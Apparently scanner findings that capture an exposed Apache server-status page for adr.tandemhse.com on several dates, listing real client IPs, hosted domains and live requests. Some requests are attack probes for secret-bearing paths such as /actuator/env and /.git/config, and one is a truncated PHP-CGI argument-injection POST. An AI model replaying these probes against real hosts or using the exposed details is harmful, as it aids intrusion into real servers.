104.23.168.21h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/27/2850_ 5.4896029371740.00.45147.67 172.71.103.222h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/21/2885_ 5.4996020729990.00.9270.78 104.23.166.12h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-26
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755961b0108
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 17-Dec-2025 05:11:54 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 3 days 22 hours 7 minutes 47 seconds Server load: 0.22 0.18 0.14 Total accesses: 100736 - Total Traffic: 3.5 GB - Total Duration: 83638126 CPU Usage: u9.34 s11.57 cu598.01 cs377.93 - .294% CPU load .297 requests/sec - 10.9 kB/second - 36.8 kB/request - 830.271 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0400117no1yes010000 1400070no0yes010000 2400203no4yes19002 3400071no0yes010000 4400072no1yes010000 Sum506 149002 ________________________W_________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-204001170/6/2313_ 0.380011028700.00.1275.68 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-204001170/4/2252_ 0.38039711928960.00.0540.90 172.68.92.202h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204001170/8/2160_ 0.392016700750.00.1086.26 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-204001170/1/2383_ 0.06153513891550.00.0367.80 162.158.108.56h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204001170/3/2249_ 0.39533314350340.00.0344.80 172.71.218.253h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204001170/4/2364_ 0.389020128400.00.0157.82 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-204001170/3/2282_ 0.3510016477460.00.0466.20 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204001170/1/2312_ 0.251035211479250.00.0353.64 108.162.226.133h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204001170/6/2221_ 0.36009887860.00.0683.85 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 0-204001170/4/2265_ 0.33679711313430.00.0573.80 162.158.186.243h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1779_ 0.0061504970800.00.0096.06 172.68.92.160h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1643_ 0.006153697789140.00.0041.34 162.158.186.132h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1629_ 0.00615136443890.00.0086.43 172.68.92.181h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1672_ 0.0061505672330.00.0024.83 104.22.20.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1719_ 0.00615177471470.00.0088.39 87.236.176.48http/1.1pre.relehse.com:443GET /login HTTP/1.1 1-204000700/0/1626_ 0.00615010599150.00.0063.70 172.68.92.175h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1605_ 0.006154028252460.00.0051.21 172.71.218.253h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1710_ 0.0061524312590240.00.0064.67 104.23.209.98h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/0/1625_ 0.0073324558110.00.0092.46 172.70.93.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-204000700/1/1778_ 0.198010925330.00.0038.49 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-204002030/7/2718_ 0.9101639915210.00.04172.28 104.23.175.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-204002030/4/2773_ 0.9021877456000.00.0297.31 188.114.111.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-204002030/3/2751_ 0.90209457730.00.0393.55 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-204002030/5/2742_ 0.901049297210.00.0294.92 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-204002030/4/2764W 0.880012400160.00.06103.06 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-204002030/7/2802_ 0.903010479550.07.1582.06 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-204002030/5/2793_ 0.90234910968520.00.03126.11 162.158.193.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-204002030/2/2795_ 0.2031713768700.00.0391.21 162.158.122.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-204002030/4/2704_ 0.901011811030.00.06111.67 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-204002030/4/2881_ 0.8739311769880.00.0469.72 205.185.114.254http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1868_ 0.0061526096660.00.0085.18 104.23.221.67h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1825_ 0.00615011623860.00.0090.63 172.69.135.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1728_ 0.0061534978581680.00.0079.92 172.68.92.185h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1745_ 0.0061507552240.00.0062.94 172.71.155.95h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1952_ 0.00615014477600.00.0055.08 172.68.92.201h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1729_ 0.0061516246770.00.0050.92 172.71.154.188h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1879_ 0.00615013611800.00.0068.02 162.158.123.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1961_ 0.0061509794240.00.0056.27 172.68.92.207h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-204000710/0/1871_ 0.0061506934130.00.0058.66 172.69.135.162h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-204000710/0/1774_ 0.0061506659580.00.0049.32 172.71.203.54h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-204000720/0/1448_ 0.00615362130025650.00.0096.66 162.158.158.205h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-204000720/0/1412_ 0.006152426423630.00.0058.09 104.22.24.223h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-204000720/0/1513_ 0.0061504616260.00.0077.80 172.68.92.187h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-204000720/0/1523_ 0.006152023526960.00.0094.10 188.114.111.209h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-204000720/0/1574_ 0.0061581316557180.00.0046.07 172.70.211.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-204000720/0/1462_ 0.006151810888400.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7558a3f78bd
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 14-Dec-2025 14:25:23 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 1 day 7 hours 21 minutes 17 seconds Server load: 0.27 0.18 0.11 Total accesses: 21015 - Total Traffic: 726.3 MB - Total Duration: 13708552 CPU Usage: u48.2 s39.91 cu81.57 cs69.1 - .212% CPU load .186 requests/sec - 6.6 kB/second - 35.4 kB/request - 652.322 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 066632no2yes19001 166498no0yes010000 266499no1yes19000 366500no1yes010010 466501no0yes010000 Sum504 248011 ____W_______________R_____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5666320/476/1018_ 24.62004571330.05.8438.30 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-5666320/472/1011_ 24.60307055270.04.7015.01 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-5666320/465/1019_ 24.60204613470.017.2240.16 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-5666320/484/1051_ 24.61308199380.07.9521.10 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-5666320/460/1026W 24.610010679850.04.7718.86 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-5666320/483/1013_ 24.611014361910.07.3831.71 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-5666320/489/1069_ 24.601010086660.06.4120.40 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-5666320/502/1041_ 24.59105534170.06.1924.92 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-5666320/497/1032_ 24.60404518980.06.7817.89 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-5666320/453/1026_ 24.61405359200.025.0640.63 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-5664980/9/48_ 10.81264255285890.00.321.89 172.69.6.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/10/45_ 10.3957299111600.00.271.61 172.71.103.177h2cinre-viewer.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/16/48_ 11.46572091610.00.1422.43 188.114.111.239h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/12/53_ 9.302911553106970.00.211.72 172.69.40.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/16/44_ 10.725678986960.00.091.09 104.28.243.220http/1.1barrerasdecontencion.com:443HEAD /test/.git/config HTTP/1.1 1-5664980/23/58_ 9.33291117105366810.00.982.30 172.69.40.156h2tandemsl.com:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 1-5664980/12/51_ 10.392637383650.00.333.37 172.71.103.177h2cinre-viewer.tandemhse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/13/39_ 10.7329119380090.00.151.52 104.28.243.220http/1.1barrerasdecontencion.com:443HEAD /wp-content/.git/config HTTP/1.1 1-5664980/11/44_ 10.395671354190.00.087.72 195.76.176.6h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5664980/7/42_ 9.2826370104650.00.021.51 172.69.40.209h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5664990/13/77R 11.3200231100.00.3812.22 172.68.36.165h2lcftech.es:443GET /shelp.php HTTP/2.0 2-5664990/10/81_ 11.3411294216480.00.241.58 172.68.36.165h2lcftech.es:443idle, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 2-5664990/13/92_ 11.3410301371970.00.221.40 172.68.36.165h2lcftech.es:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 2-5664990/13/98_ 11.3215283268260.00.561.81 172.68.36.165h2lcftech.es:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 2-5664990/15/128_ 11.3413300368480.00.524.64 172.68.36.165h2lcftech.es:443idle, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 2-5664990/11/83_ 11.349269247490.00.882.38 172.68.36.165h2lcftech.es:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 2-5664990/13/119_ 11.3314297271110.00.352.97 172.68.36.165h2lcftech.es:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 2-5664990/19/96_ 11.355257318620.00.733.57 172.68.36.165h2lcftech.es:443idle, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 2-5664990/18/95_ 11.3412298289430.00.364.60 172.68.36.165h2lcftech.es:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 2-5664990/12/90_ 11.354303219940.00.222.06 172.68.36.165h2lcftech.es:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 3-5665000/390/422_ 23.28100817360.05.3417.59 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-5665000/407/436_ 23.2712169835140.04.708.32 172.68.36.164h2lcftech.es:443idle, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 3-5665000/417/442_ 23.2941661017830.06.827.19 172.68.36.164h2lcftech.es:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 3-5665000/422/451_ 23.2711157815570.06.9920.63 172.68.36.164h2lcftech.es:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 3-5665000/406/427_ 23.2811181737340.07.358.52 172.68.36.164h2lcftech.es:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 3-5665000/423/442_ 23.300180811070.05.907.09 172.68.36.164h2lcftech.es:443idle, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 3-5665000/428/461_ 23.289157946660.013.2515.32 172.68.36.164h2lcftech.es:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 3-5665000/385/409_ 23.279163935440.06.809.01 172.68.36.164h2lcftech.es:443idle, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 3-5665000/403/428_ 23.28120828810.06.598.30 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-5665000/422/444_ 23.295159753370.05.846.20 172.68.36.164h2lcftech.es:443idle, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 4-5665010/6/493_ 10.225672891677010.00.2036.00 197.234.242.88h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5665010/19/451_ 11.136823788030.00.3215.74 46.205.197.6http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5665010/20/495_ 11.46732781610910.00.2645.39 172.71.194.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5665010/19/471_ 10.051254017525750.00.2843.50 46.205.197.6http/1.1 4-5665010/16/509_ 10.30125415111078410.00.1712.17 109.243.130.151http/1.1 4-5665010/14/488_ 11.136821487790.00.2234.85 109.243.130.151http/1.1relehse.com:443GET /admin_layout/plugins/validation/jquery.validate.min.js HTT 4-5665010/17/525_ 10.255673131627720.00.33
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7550cc8f32d
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 13-Dec-2025 17:54:14 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 10 hours 50 minutes 8 seconds Server load: 0.14 0.14 0.15 Total accesses: 5633 - Total Traffic: 312.1 MB - Total Duration: 9849927 CPU Usage: u40.4 s36.01 cu0 cs0 - .196% CPU load .144 requests/sec - 8.2 kB/second - 56.7 kB/request - 1748.61 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0990no0yes19000 1991no0yes010000 2992no0yes010000 3993no0yes010000 41338no0yes010000 Sum500 149000 ______W___________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-09900/257/257_ 20.1661502791490.027.4427.44 104.23.170.67h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/259/259_ 20.23205165460.06.086.08 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-09900/255/255_ 20.111192436090.07.457.45 172.68.134.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/277/277_ 19.842196298280.05.405.40 162.158.122.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/252/252_ 20.22108723920.03.993.99 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-09900/241/241_ 20.1931412464880.06.756.75 162.158.122.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-09900/287/287W 20.22008151150.06.546.54 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-09900/261/261_ 20.21703702170.014.1414.14 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-09900/241/241_ 20.22602563530.04.324.32 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-09900/269/269_ 20.22303490910.06.836.83 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-09910/25/25_ 11.1649622732400.01.151.15 172.70.211.5h2tandemsl.com:443idle, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 1-09910/23/23_ 11.1448423236470.00.700.70 172.70.211.5h2tandemsl.com:443done, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 1-09910/16/16_ 11.1448122315510.00.410.41 172.70.211.5h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 1-09910/21/21_ 11.1748922827900.01.161.16 172.70.211.5h2tandemsl.com:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 1-09910/20/20_ 11.1649093441580.00.430.43 172.70.211.5h2tandemsl.com:443idle, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 1-09910/21/21_ 11.145002265108470.00.380.38 172.70.211.5h2tandemsl.com:443idle, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 1-09910/23/23_ 11.1649531536670.02.152.15 172.70.211.5h2tandemsl.com:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 1-09910/17/17_ 11.1649425259290.00.470.47 172.70.211.5h2tandemsl.com:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 1-09910/19/19_ 11.1448220042010.06.826.82 172.70.211.5h2tandemsl.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 1-09910/21/21_ 11.15497204074340.00.220.22 172.70.211.5h2tandemsl.com:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 2-09920/17/17_ 10.57268026980.011.3711.37 172.70.220.39h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/14/14_ 10.532298022070.00.660.66 172.69.109.203h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/19/19_ 11.18142166380.00.200.20 172.69.17.60h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/15/15_ 10.44137038420.00.300.30 172.71.160.96h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/17/17_ 10.53142025460.01.601.60 172.70.220.28h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/9/9_ 10.532299217860.00.070.07 198.41.242.191h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/17/17_ 11.1327331546780.00.340.34 172.71.182.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/15/15_ 10.56268015990.01.621.62 172.69.109.227h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/18/18_ 10.542298060550.01.951.95 172.69.109.242h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-09920/10/10_ 10.50137116330.00.250.25 172.69.109.243h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/14/14_ 10.30229805210.00.870.87 172.69.109.166h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/19/19_ 10.33210109880.00.850.85 172.69.109.29h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/15/15_ 10.511595479730.00.250.25 114.119.157.24http/1.1barrerasdecontencion.com:443GET /barreras-contra-inundaciones/ HTTP/1.1 3-09930/15/15_ 10.242298022360.012.9512.95 104.23.170.45h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/11/11_ 10.38210601250.00.420.42 172.69.109.230h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/11/11_ 10.2421010920.00.100.10 104.23.172.60h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/18/18_ 10.30210108390.00.920.92 172.69.109.174h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/15/15_ 10.332106048810.00.900.90 172.70.220.7h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/17/17_ 10.24159507700.00.690.69 104.23.172.81h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-09930/11/11_ 10.382106046490.00.220.22 172.69.109.179h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/261/261_ 21.23110908660.029.6529.65 108.162.246.223h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/226/226_ 21.23402974660.09.779.77 104.23.251.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/241/241_ 21.3200828120.032.9432.94 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-013380/236/236_ 21.2712316805920.037.9137.91 162.158.186.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-013380/257/257_ 21.327010454420.05.695.69 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-013380/261/261_ 21.3240757140.06.296.29 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-013380/264/264_ 21.31120785960.010.8710.87 159.65.18.197http/1.17f7ffb32-1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755ff17c72c
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 01-Dec-2025 18:39:30 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 427 Parent Server MPM Generation: 426 Server uptime: 80 days 6 hours 18 minutes 27 seconds Server load: 0.24 0.18 0.36 Total accesses: 2506000 - Total Traffic: 77.1 GB - Total Duration: 1604730452 CPU Usage: u207.61 s252.1 cu13964.7 cs8015.45 - .324% CPU load .361 requests/sec - 11.7 kB/second - 32.3 kB/request - 640.355 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01709860no0yes010000 11709993no0yes010000 21709861no0yes010000 31709859no1yes19000 41709964no0yes010000 Sum501 149000 ____________________________________W_____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-42617098600/93/45958_ 8.157370342327870.03.261701.09 172.71.234.69h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/96/45306_ 8.00737460496557200.03.021457.18 172.70.142.208h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/98/45962_ 8.02743594229151290.01.951473.45 172.71.144.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/101/45522_ 8.157371223373910.02.321508.95 172.71.234.205h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/96/46231_ 8.167420216402810.03.041567.65 104.22.10.25h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/93/45767_ 7.967380216014800.03.751554.63 162.158.122.102h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/84/45895_ 7.967420299258090.01.001459.41 162.158.120.195h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/84/45267_ 8.05738727225711600.01.611550.26 172.71.124.14h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/92/46047_ 7.95743470221087970.03.841433.89 108.162.220.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42617098600/94/45838_ 7.88738460330920560.05.061665.94 172.70.93.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/171/51410_ 14.1112234149680.034.521714.84 172.68.134.234h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-42617099930/198/51896_ 14.1810272158120.07.751679.89 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-42617099930/176/51511_ 14.1740290354670.015.551606.49 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-42617099930/206/51460_ 14.1260731651010.06.811563.87 172.68.134.115h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/169/51878_ 14.025222434023110.037.021657.39 104.23.251.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/181/52738_ 14.1660252498580.09.561593.40 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-42617099930/181/51791_ 14.1200285604660.010.421568.72 172.68.134.225h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/167/52321_ 14.022294230918520.09.371595.57 104.23.251.27h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42617099930/195/50617_ 